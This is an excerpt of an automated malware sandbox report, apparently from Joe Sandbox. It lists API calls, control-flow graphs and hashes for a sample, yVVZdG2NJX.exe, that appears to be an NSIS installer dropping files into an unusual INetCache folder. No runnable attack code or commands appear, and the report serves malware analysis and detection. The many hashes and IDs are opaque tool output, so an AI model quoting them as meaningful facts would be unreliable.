                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                      • String ID:
                                                                      • API String ID: 245916457-0
                                                                      • Opcode ID: 3bc7046d160a1825fcaf16214784d309b50f81b51c92c3d8197b0be18138dc56
                                                                      • Instruction ID: be9ddf896ad3e724a758fe26ae4a600768dda62136bcd8fe7b79d691b523d28f
                                                                      • Opcode Fuzzy Hash: 3bc7046d160a1825fcaf16214784d309b50f81b51c92c3d8197b0be18138dc56
                                                                      • Instruction Fuzzy Hash: 48226C73D14209EFCB128FB4C980AAEB7B9FB04315F21452EE196E7380D7749A85DB50

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 004059D2
                                                                      • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A1A
                                                                      • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A3D
                                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A43
                                                                      • FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405A53
                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
                                                                      • FindClose.KERNEL32(00000000), ref: 00405B02
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\yVVZdG2NJX.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                      • API String ID: 2035342205-163191563
                                                                      • Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                      • Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
                                                                      • Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
                                                                      • Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E

                                                                      Control-flow Graph
                                                                      control_flow_graph 1077 4065da-4065ee FindFirstFileW 1078 4065f0-4065f9 FindClose 1077->1078 1079 4065fb 1077->1079 1080 4065fd-4065fe 1078->1080 1079->1080
                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,?,774D3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,774D3420), ref: 004065E5
                                                                      • FindClose.KERNEL32(00000000), ref: 004065F1
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsg9061.tmp, xrefs: 004065DA
                                                                      • pOz, xrefs: 004065DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsg9061.tmp$pOz
                                                                      • API String ID: 2295610775-3911491118
                                                                      • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                      • Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
                                                                      • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                      • Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
                                                                      APIs
                                                                      • SendMessageW.USER32(00000028,?,?,0040406E), ref: 00404251
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                      • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                                                      • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                      • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09

                                                                      Control-flow Graph
                                                                      control_flow_graph 261 403d35-403d47 262 403e88-403e97 261->262 263 403d4d-403d53 261->263 264 403ee6-403efb 262->264 265 403e99-403ee1 GetDlgItem * 2 call 40420e SetClassLongW call 40140b 262->265 263->262 266 403d59-403d62 263->266 268 403f3b-403f40 call 40425a 264->268 269 403efd-403f00 264->269 265->264 270 403d64-403d71 SetWindowPos 266->270 271 403d77-403d7a 266->271 283 403f45-403f60 268->283 275 403f02-403f0d call 401389 269->275 276 403f33-403f35 269->276 270->271 272 403d94-403d9a 271->272 273 403d7c-403d8e ShowWindow 271->273 278 403db6-403db9 272->278 279 403d9c-403db1 DestroyWindow 272->279 273->272 275->276 298 403f0f-403f2e SendMessageW 275->298 276->268 282 4041db 276->282 287 403dbb-403dc7 SetWindowLongW 278->287 288 403dcc-403dd2 278->288 284 4041b8-4041be 279->284 286 4041dd-4041e4 282->286 290 403f62-403f64 call 40140b 283->290 291 403f69-403f6f 283->291 284->282 293 4041c0-4041c6 284->293 287->286 296 403e75-403e83 call 404275 288->296 297 403dd8-403de9 GetDlgItem 288->297 290->291 294 403f75-403f80 291->294 295 404199-4041b2 DestroyWindow EndDialog 291->295 293->282 299 4041c8-4041d1 ShowWindow 293->299 294->295 300 403f86-403fd3 call 4062b9 call 40420e * 3 GetDlgItem 294->300 295->284 296->286 301 403e08-403e0b 297->301 302 403deb-403e02 SendMessageW IsWindowEnabled 297->302 298->286 299->282 331 403fd5-403fda 300->331 332 403fdd-404019 ShowWindow KiUserCallbackDispatcher call 404230 EnableWindow 300->332 305 403e10-403e13 301->305 306 403e0d-403e0e 301->306 302->282 302->301 310 403e21-403e26 305->310 311 403e15-403e1b 305->311 309 403e3e-403e43 call 4041e7 306->309 309->296 314 403e5c-403e6f SendMessageW 310->314 316 403e28-403e2e 310->316 311->314 315 403e1d-403e1f 311->315 314->296 315->309 317 403e30-403e36 call 40140b 316->317 318 403e45-403e4e call 40140b 316->318 327 403e3c 317->327 318->296 328 403e50-403e5a 318->328 327->309 328->327 331->332 335 40401b-40401c 332->335 336 40401e 332->336 337 404020-40404e GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404050-404061 SendMessageW 337->338 339 404063 337->339 340 404069-4040a8 call 404243 call 403d16 call 406297 lstrlenW call 4062b9 SetWindowTextW call 401389 338->340 339->340 340->283 351 4040ae-4040b0 340->351 351->283 352 4040b6-4040ba 351->352 353 4040d9-4040ed DestroyWindow 352->353 354 4040bc-4040c2 352->354 353->284 356 4040f3-404120 CreateDialogParamW 353->356 354->282 355 4040c8-4040ce 354->355 355->283 357 4040d4 355->357 356->284 358 404126-40417d call 40420e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 40417f-404197 ShowWindow call 40425a 358->363 363->284
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                                                      • ShowWindow.USER32(?), ref: 00403D8E
                                                                      • DestroyWindow.USER32 ref: 00403DA2
                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                                                      • GetDlgItem.USER32(?,?), ref: 00403DDF
                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                                                      • GetDlgItem.USER32(?,?), ref: 00403EA8
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F1D
                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
                                                                      • EnableWindow.USER32(?,?), ref: 00404011
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404027
                                                                      • EnableMenuItem.USER32(00000000), ref: 0040402E
                                                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404046
                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                                                      • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                                                      • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                                                      • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                      • String ID:
                                                                      • API String ID: 3282139019-0
                                                                      • Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                      • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                                                      • Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                      • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E

                                                                      Control-flow Graph
                                                                      control_flow_graph 366 403987-40399f call 406671 369 4039a1-4039ac GetUserDefaultUILanguage call 4061de 366->369 370 4039b3-4039ea call 406165 366->370 373 4039b1 369->373 376 403a02-403a08 lstrcatW 370->376 377 4039ec-4039fd call 406165 370->377 375 403a0d-403a36 call 403c5d call 405c74 373->375 383 403ac8-403ad0 call 405c74 375->383 384 403a3c-403a41 375->384 376->375 377->376 390 403ad2-403ad9 call 4062b9 383->390 391 403ade-403b03 LoadImageW 383->391 384->383 385 403a47-403a6f call 406165 384->385 385->383 392 403a71-403a75 385->392 390->391 394 403b84-403b8c call 40140b 391->394 395 403b05-403b35 RegisterClassW 391->395 399 403a87-403a93 lstrlenW 392->399 400 403a77-403a84 call 405b99 392->400 407 403b96-403ba1 call 403c5d 394->407 408 403b8e-403b91 394->408 396 403c53 395->396 397 403b3b-403b7f SystemParametersInfoW CreateWindowExW 395->397 405 403c55-403c5c 396->405 397->394 401 403a95-403aa3 lstrcmpiW 399->401 402 403abb-403ac3 call 405b6c call 406297 399->402 400->399 401->402 406 403aa5-403aaf GetFileAttributesW 401->406 402->383 411 403ab1-403ab3 406->411 412 403ab5-403ab6 call 405bb8 406->412 418 403ba7-403bc1 ShowWindow call 406601 407->418 419 403c2a-403c32 call 4053d2 407->419 408->405 411->402 411->412 412->402 426 403bc3-403bc8 call 406601 418->426 427 403bcd-403bdf GetClassInfoW 418->427 424 403c34-403c3a 419->424 425 403c4c-403c4e call 40140b 419->425 424->408 428 403c40-403c47 call 40140b 424->428 425->396 426->427 431 403be1-403bf1 GetClassInfoW RegisterClassW 427->431 432 403bf7-403c1a DialogBoxParamW call 40140b 427->432 428->408 431->432 435 403c1f-403c28 call 4038d7 432->435 435->405
                                                                      APIs
                                                                        • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                        • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,774D3420,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000), ref: 004039A1
                                                                        • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                      • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,774D3420,"C:\Users\user\Desktop\yVVZdG2NJX.exe",00000000), ref: 00403A08
                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403AA6
                                                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne), ref: 00403AEF
                                                                      • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403BAF
                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                                                      • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                                                      • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                                                      • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\yVVZdG2NJX.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                      • API String ID: 606308-3242603728
                                                                      • Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                      • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                                                      • Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                      • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D

                                                                      Control-flow Graph
                                                                      control_flow_graph 439 402edd-402f2b GetTickCount GetModuleFileNameW call 405d8d 442 402f37-402f65 call 406297 call 405bb8 call 406297 GetFileSize 439->442 443 402f2d-402f32 439->443 451 403052-403060 call 402e79 442->451 452 402f6b 442->452 444 40310f-403113 443->444 458 403062-403065 451->458 459 4030b5-4030ba 451->459 454 402f70-402f87 452->454 456 402f89 454->456 457 402f8b-402f94 call 40330e 454->457 456->457 465 402f9a-402fa1 457->465 466 4030bc-4030c4 call 402e79 457->466 461 403067-40307f call 403324 call 40330e 458->461 462 403089-4030b3 GlobalAlloc call 403324 call 403116 458->462 459->444 461->459 485 403081-403087 461->485 462->459 490 4030c6-4030d7 462->490 470 402fa3-402fb7 call 405d48 465->470 471 40301d-403021 465->471 466->459 476 40302b-403031 470->476 488 402fb9-402fc0 470->488 475 403023-40302a call 402e79 471->475 471->476 475->476 481 403040-40304a 476->481 482 403033-40303d call 406764 476->482 481->454 489 403050 481->489 482->481 485->459 485->462 488->476 494 402fc2-402fc9 488->494 489->451 491 4030d9 490->491 492 4030df-4030e4 490->492 491->492 495 4030e5-4030eb 492->495 494->476 496 402fcb-402fd2 494->496 495->495 497 4030ed-403108 SetFilePointer call 405d48 495->497 496->476 498 402fd4-402fdb 496->498 502 40310d 497->502 498->476 499 402fdd-402ffd 498->499 499->459 501 403003-403007 499->501 503 403009-40300d 501->503 504 40300f-403017 501->504 502->444 503->489 503->504 504->476 505 403019-40301b 504->505 505->476
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402EEE
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\yVVZdG2NJX.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                        • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\yVVZdG2NJX.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                        • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                      • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yVVZdG2NJX.exe,C:\Users\user\Desktop\yVVZdG2NJX.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\yVVZdG2NJX.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\yVVZdG2NJX.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                      • API String ID: 4283519449-1495482793
                                                                      • Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                      • Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
                                                                      • Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                      • Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D

Control-flow Graph (graph image not captured): function 004062B9, basic blocks 4062b9-406528; calls GetSystemDirectoryW, GetWindowsDirectoryW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, CoTaskMemFree, lstrcatW, lstrlenW and internal functions 406297, 4061de, 406165, 40652b and 4062b9 itself (recursive call).
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063FA
                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 0040640D
                                                                      • SHGetSpecialFolderLocation.SHELL32(00405336,007924D8,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 00406449
                                                                      • SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 00406457
